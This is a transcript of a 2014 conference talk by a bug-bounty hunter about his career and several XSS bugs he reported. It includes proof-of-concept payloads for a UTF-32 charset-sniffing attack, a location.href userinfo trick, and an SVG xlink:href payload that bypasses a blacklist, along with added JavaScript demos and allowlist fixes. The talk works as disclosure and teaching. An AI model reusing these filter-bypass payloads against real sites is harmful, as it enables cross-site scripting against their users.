CODE BLUE 2014 : Joy of a bug hunter by Masato Kinugawa

Recently, the number of enterprises that pay rewards for reporting security bugs has been increasing. I have also received a large amount of rewards through such reward programs for reporting bugs. In fact, I earn a living from these rewards, so it is no exaggeration to say that I am a professional bug hunter. I will speak about how to become a professional bug hunter, what the rules actually are from the point of view of an active participant, and how to discover vulnerabilities, including technical topics.


  1. Bug-hunter's Joy. Masato Kinugawa
  2. Name: Masato Kinugawa. Nationality: Japanese (maybe). Hobby: listening to music, and XSS. Profession: Bug-hunter
  3. First: Bug-hunter's life and bounty programs. Second: Delightful bugs. Third: The reasons why I became a bug-hunter
  4. Bug-hunter's Life and Bounty Programs
  5. Workplace: home. Working hours: any time I want. Work: finding security bugs. Income: bug bounties ➡ Does it make enough money to live on?
  6. 27135346 (JPY) = $142723 ($1 = 120 JPY)
  7. 27135346 (JPY) = $142723 ($1 = 120 JPY) (in octal digits; in decimal that is 6,077,158 JPY, or $50,643)
  8. Google launched its program in 2010, followed by many companies.
  9. Google Vulnerability Reward Program: 1 bug = $100 to $20,000. Total bounties: $130,803.7. Number of bugs reported: 127 (191 including duplicated and/or not rewarded ones)
  10. Even more motivated by the increased bounty rates!
  11. I am actually a night owl…
  12. Quick response ever since the program was launched. They consider NOT ONLY the seriousness but also how "interesting" the bug is. Only a simple explanation is required to have them understand the problem. They provide fun to the reporters.
  13. The most important domain of Google. The bounty was $5,000 (exceeding the regulated maximum amount at that time)
  14. https://accounts.google.com/example?oe=utf-32

      HTTP/1.1 200 OK
      Alternate-Protocol: 443:quic,p=0.01
      Cache-Control: private, max-age=0
      Content-Encoding: gzip
      Content-Type: text/html; charset=UTF-32
      ...

      The character code (charset) of the response can be set from the URL, and UTF-32 could be set.
  15. The injected parameter value: ∀㸀㰀script㸀alert(1)㰀/script㸀
  16. Three ingredients: ➊ the array of bytes, ❷ the character code of the page, ❸ the handling of 0x00 characters
  17. ➊ In UTF-32, one character requires 4 bytes. The value from slide 15 is served as the following byte array (UTF-32BE, 12 bytes per row). ∀ (U+2200), 㸀 (U+3E00) and 㰀 (U+3C00) are used instead of ", > and < because their encodings are 00 00 22 00, 00 00 3E 00 and 00 00 3C 00, and 0x22, 0x3E and 0x3C are exactly ", > and <; none of the characters an HTML escaper looks for appears in the request.

      00 00 22 00 00 00 3E 00 00 00 3C 00
      00 00 00 73 00 00 00 63 00 00 00 72
      00 00 00 69 00 00 00 70 00 00 00 74
      00 00 3E 00 00 00 00 61 00 00 00 6C
      00 00 00 65 00 00 00 72 00 00 00 74
      00 00 00 28 00 00 00 31 00 00 00 29
      00 00 3C 00 00 00 00 2F 00 00 00 73
      00 00 00 63 00 00 00 72 00 00 00 69
      00 00 00 70 00 00 00 74 00 00 3E 00

  18. ❷ IE does not support UTF-32 ➡ the character code is "recognized" (sniffed) as something else, so the same byte array (as on slide 17) is read under a different encoding.
  19. This "super great" web site provides the support status of character encodings in all web browsers: http://l0.cm/encodings/table/
  20. ❸ IE (<= 9) ignores 0x00 characters ➡ the "00" bytes are understood as nothing, and what remains of the byte array on slide 17 reads as:

      "><script>alert(1)</script>

  21. "Message from the web page" (IE's alert dialog)
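The three ingredients above, as an added example that is not code from the talk: it encodes the slide 15 value as UTF-32BE, prints the byte array of slide 17, decodes it once as a UTF-32-aware client would and once with a model of the IE<=9 behaviour from slide 20 (read the bytes one per character, treat 0x00 as nothing), and ends with the web-service-level fix, a charset allowlist. The page template, the escaper, the IE model and the allowlist contents are assumptions made for the demo.

```javascript
// Added example, not code from the talk. Models slides 16-20: the UTF-32
// byte array, the charset the browser ends up using, and dropped 0x00 bytes.
// The page template, escaper and charset allowlist are demo assumptions.

// The parameter value from slide 15: U+2200, U+3E00 and U+3C00 stand in
// for ", > and <. None of the characters an HTML escaper looks for is present.
const PAYLOAD = '\u2200\u3E00\u3C00script\u3E00alert(1)\u3C00/script\u3E00';

// Ordinary HTML escaping, as a template engine would apply it.
function escapeHtml(s) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return s.replace(/[&<>"']/g, c => map[c]);
}

// The (assumed) page: the parameter is reflected, escaped, into an attribute.
function pageSource(value) {
  return '<input value="' + escapeHtml(value) + '">';
}

// Encode a string as UTF-32BE, 4 bytes per code point, as the server does
// when the response is served with charset=UTF-32.
function encodeUtf32be(s) {
  const out = [];
  for (const ch of s) {                       // for..of walks code points
    const cp = ch.codePointAt(0);
    out.push((cp >>> 24) & 0xff, (cp >>> 16) & 0xff, (cp >>> 8) & 0xff, cp & 0xff);
  }
  return Uint8Array.from(out);
}

// Hex dump in the 12-bytes-per-row layout of slide 17.
function hexDump(bytes, perRow = 12) {
  const rows = [];
  for (let i = 0; i < bytes.length; i += perRow) {
    rows.push(Array.from(bytes.slice(i, i + perRow),
      b => b.toString(16).toUpperCase().padStart(2, '0')).join(' '));
  }
  return rows.join('\n');
}

// A client that really understands UTF-32BE sees the harmless page.
function decodeUtf32be(bytes) {
  let s = '';
  for (let i = 0; i + 3 < bytes.length; i += 4) {
    const cp = ((bytes[i] << 24) | (bytes[i + 1] << 16) | (bytes[i + 2] << 8) | bytes[i + 3]) >>> 0;
    s += String.fromCodePoint(cp);
  }
  return s;
}

// Model of IE<=9 (slides 18 and 20): no UTF-32 support, so the bytes are
// read one per character and every 0x00 byte is treated as nothing.
function decodeLikeOldIE(bytes) {
  let s = '';
  for (const b of bytes) if (b !== 0) s += String.fromCharCode(b);
  return s;
}

// Web-service-level fix: never let the URL pick a charset outside an
// allowlist that every supported browser decodes the same way.
const ALLOWED_CHARSETS = new Set(['utf-8']);   // assumption for this demo
function selectCharset(requested) {
  const c = String(requested || '').trim().toLowerCase();
  return ALLOWED_CHARSETS.has(c) ? c : 'utf-8';
}

const bytes = encodeUtf32be(pageSource(PAYLOAD));
console.log(hexDump(encodeUtf32be(PAYLOAD)));      // the slide 17 array
console.log('UTF-32 aware client sees:', decodeUtf32be(bytes));
console.log('IE<=9 model sees:        ', decodeLikeOldIE(bytes));
console.log('oe=utf-32 is answered with', selectCharset('utf-32'));
```

Run with `node`. The UTF-32-aware decode returns the page unchanged, with the CJK characters still inside the quoted attribute; the IE model returns `<input value=""><script>alert(1)</script>">`, which is the string on slide 20 wrapped in the attribute. `selectCharset` is the whole fix on the server side: the `oe` parameter may still exist, but it can no longer select an encoding the browser will sniff into something else.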
  22. Seek browser and plug-in bugs too [slide art: a figure drawn in binary digits]
  23. Browser and plug-in bugs are 28.7% of the total number of bugs I reported; 87% of those are in IE
  24. They take longer to fix, and even when one is fixed, the fix is NOT likely to be applied to other IE versions. Therefore, something is required at the web service level.
  25. location.href is the JavaScript property that gives the URL of the current page: for http://example.com/, location.href is http://example.com/
  26. For http://evil%2F@example.com/, location.href is http://evil/@example.com/. The part of the URL before "@" (the userinfo) is automatically decoded! ➡ This produces a URL that points to an external web site: the host is now evil and the path is /@example.com/.
  27. Therefore, all code that treats location.href as a URL pointing to its own domain is potentially vulnerable. I added characters before "@" and then checked whether any web page sent a request to the external site.
  28. http://evil%2F@www.youtube.com/
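The probe from slides 26 to 28 and the web-service-level check slide 24 asks for, as an added example that is not code from the talk. `decodeUserinfoLikeIE` is a model of the decoding shown on slide 26 (the userinfo comes back percent-decoded from location.href); it is not any browser's real parser. The page code that derives a request URL from location.href, the sample URLs and the expected origin are constructed for the demo.

```javascript
// Added example, not code from the talk. decodeUserinfoLikeIE models the
// behaviour on slide 26; the page code and sample URLs are constructed.

// Slide 27's probe: put "<marker>@" in front of the host of a URL.
function withUserinfoProbe(url, marker = 'evil%2F') {
  const u = new URL(url);
  return u.protocol + '//' + marker + '@' + u.host + u.pathname + u.search + u.hash;
}

// Model of the decoding on slide 26: "http://evil%2F@host/" is reported
// by location.href as "http://evil/@host/".
function decodeUserinfoLikeIE(href) {
  const m = /^([a-z][a-z0-9+.-]*:\/\/)([^/?#@]*)@(.*)$/i.exec(href);
  return m ? m[1] + decodeURIComponent(m[2]) + '@' + m[3] : href;
}

// Where a request built from that string actually goes.
function originOf(href) {
  return new URL(href).origin;
}

// Vulnerable pattern (constructed): page script that assumes location.href
// is "my own URL" and derives an API endpoint from it.
function buildApiUrlVulnerable(href) {
  return href.replace(/[?#].*$/, '') + '?format=json';
}

// Web-service-level fix (slide 24): parse, check the origin, and drop the
// userinfo before reusing the URL for anything.
function buildApiUrlSafe(href, expectedOrigin) {
  const u = new URL(href);
  if (u.origin !== expectedOrigin) {
    throw new Error('location.href is off-site: ' + u.origin);
  }
  u.username = '';
  u.password = '';
  u.hash = '';
  u.searchParams.set('format', 'json');
  return u.href;
}

const probe = withUserinfoProbe('http://www.youtube.com/');     // slide 28
const seenByPage = decodeUserinfoLikeIE(probe);
console.log('URL in the address bar :', probe, '->', originOf(probe));
console.log('location.href (model)  :', seenByPage, '->', originOf(seenByPage));
console.log('vulnerable API URL     :', buildApiUrlVulnerable(seenByPage));
try {
  buildApiUrlSafe(seenByPage, 'http://www.youtube.com');
} catch (e) {
  console.log('hardened builder       :', e.message);
}
```

The address-bar URL and the decoded one parse to different origins: `http://evil%2F@www.youtube.com/` has host www.youtube.com with username `evil%2F`, while `http://evil/@www.youtube.com/` has host evil. Any request the page builds from the second string leaves the site, which is exactly what the probe on slide 27 looks for. Parsing location.href with `URL` and comparing `origin` against the origin the page expects catches the decoded form; clearing the userinfo also removes the marker from the plain form before it is echoed anywhere.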
  29. At the same time, I found a fatal bug. It exists in feed:// URLs, which represent RSS. By customizing the part of the URL before "@", an unrelated feed can be loaded into any domain. Put scripts in that unrelated feed, and the XSS works on the domain it was loaded into ➡ therefore we can force XSS on any web site \(^o^)/ yeah☆
  30. In feed:// URLs, characters which can run scripts are restricted (= a blacklist). Things to do: it is easy; just get past the blacklist!
  31. <a href="javascript:alert(1)">XSS</a> becomes <a>XSS</a>. Find out which characters pass through, based on the character-removal pattern. Beeping! (the filter catches it)
  32. Silence… (the filter does not catch it):

      <svg>
       <a xmlns:xlink="http://www.w3.org/1999/xlink"
       xlink:href="javascript:alert(1)">
       <rect width="1000" height="1000" />
       </a>
      </svg>

  33. feed://l0.cm%2Fcb.rss%3F@codeblue.jp/
  34. feed://l0.cm%2Fcb.rss%3F@codeblue.jp/ ➡ alert('CODE BLUE、2回目開催おめでとう!\n'+document.domain+'から') ("Congratulations on the 2nd CODE BLUE! from " followed by document.domain, which is codeblue.jp here)
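Why the blacklist on slide 30 fails against the SVG on slide 32, as an added example that is not the talk's code and not the real feed:// filter: a constructed blacklist sanitizer that strips `href="javascript:"` the way slide 31 shows, the slide 32 payload going straight through it, and an allowlist sanitizer that drops it. The tag and attribute allowlist and the regex tokenizer are demo assumptions; a production sanitizer should work on a real HTML parse tree rather than on regexes.

```javascript
// Added example, not the talk's code and not the real feed:// filter.
// The allowlist contents and the regex tokenizer are demo assumptions.

const SCRIPT_SCHEME = /^\s*javascript\s*:/i;

// Blacklist: only an href whose value starts with "javascript:" is removed.
// "xlink:href" is a different attribute name, so it is never examined.
function sanitizeBlacklist(html) {
  return html.replace(/\shref\s*=\s*(?:"([^"]*)"|'([^']*)')/gi, (m, dq, sq) =>
    SCRIPT_SCHEME.test(dq ?? sq) ? '' : m);
}

// Allowlist: unknown tags and unknown attributes are dropped, and href must
// carry an http(s), relative or fragment URL.
const ALLOWED_TAGS = { a: ['href', 'title'], p: [], b: [], i: [], br: [] };
const SAFE_URL = /^(https?:|\/|#)/i;

function sanitizeAllowlist(html) {
  return html.replace(/<\/?([a-zA-Z][\w:-]*)([^>]*)>/g, (tag, name, attrs) => {
    const n = name.toLowerCase();
    if (!Object.prototype.hasOwnProperty.call(ALLOWED_TAGS, n)) return ''; // svg, rect, script, ...
    if (tag.startsWith('</')) return '</' + n + '>';
    let kept = '';
    const attrRe = /([^\s=\/]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s>]+))/g;
    for (let a; (a = attrRe.exec(attrs)) !== null;) {
      const an = a[1].toLowerCase();
      const av = a[2] ?? a[3] ?? a[4];
      if (!ALLOWED_TAGS[n].includes(an)) continue;        // xlink:href, onclick, xmlns:*
      if (an === 'href' && !SAFE_URL.test(av)) continue;  // javascript:, data:, ...
      kept += ' ' + an + '="' + av.replace(/"/g, '&quot;') + '"';
    }
    return '<' + n + kept + '>';
  });
}

// Constructed inputs: slide 31's link and slide 32's SVG, on one line each.
const LINK = '<a href="javascript:alert(1)">XSS</a>';
const SVG = '<svg><a xmlns:xlink="http://www.w3.org/1999/xlink" xlink:href="javascript:alert(1)">' +
            '<rect width="1000" height="1000" /></a></svg>';

console.log(sanitizeBlacklist(LINK));   // <a>XSS</a>   (Beeping!)
console.log(sanitizeBlacklist(SVG));    // unchanged     (Silence...)
console.log(sanitizeAllowlist(SVG));    // <a></a>
```

The blacklist removes what it was written to remove and nothing else; the SVG payload reaches the browser intact because the attribute that carries the script is spelled `xlink:href`, not `href`. The allowlist never has to know that name: anything it was not told to keep is gone, which is the property a filter in front of another site's origin needs.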
  35. Web applications are put in jeopardy by character codes, browser behaviors and bugs, and so on… Finding out mysteriously complicated bugs is the ultimate delight. Want to see more? http://masatokinugawa.l0.cm/
  36. Grew up in touch with computers. Love to disassemble anything. Debuted as an XSS "attacker" in the 6th grade.
  37. Grew up in touch with computers ➡ I got to know what binary is in 2009. Love to disassemble anything ➡ I don't love doing it (that much). Debuted as an XSS "attacker" in the 6th grade ➡ I got interested in security in 2009.
  38. Decided to do what I want, in my way. ~2009: a lot happened. 2010: left computer vocational school.
  39. What I want to do: seeking vulnerabilities. Found so many! Soon after, Google launched its bug bounty program. Spent all waking hours finding vulnerabilities.
  40. Wish for the future… Bug-hunting house-husband? ➡ Need to gain girl-hunting skill too ☺. An extension of what I want to do. One day, I found myself a bug-hunter.
  41. Most of the time must be spent repeating unsophisticated verification tests. No income unless I find something. However… the feeling of accomplishment is great, as what I achieved directly becomes money. Nothing in the world feels as delightful as treasure hunting. Abnormal behaviors are much fun to see.
  42. The finding skill is all you need: you can concentrate on improving that skill. You can do it by yourself: almost no human-relationship issues. You can do it at home: no commuting time. You can work at your own pace: do it when you want.
  43. For those who are trying to find their way... "Listening to music" as a hobby; "bug-hunting" as a hobby (same as above). "Hobby": do anything you want! Then you may find your own way.
  44. Understood?!
  45. Thank you! Contact: @kinugawamasato ✉ masatokinugawa [at] gmail.com
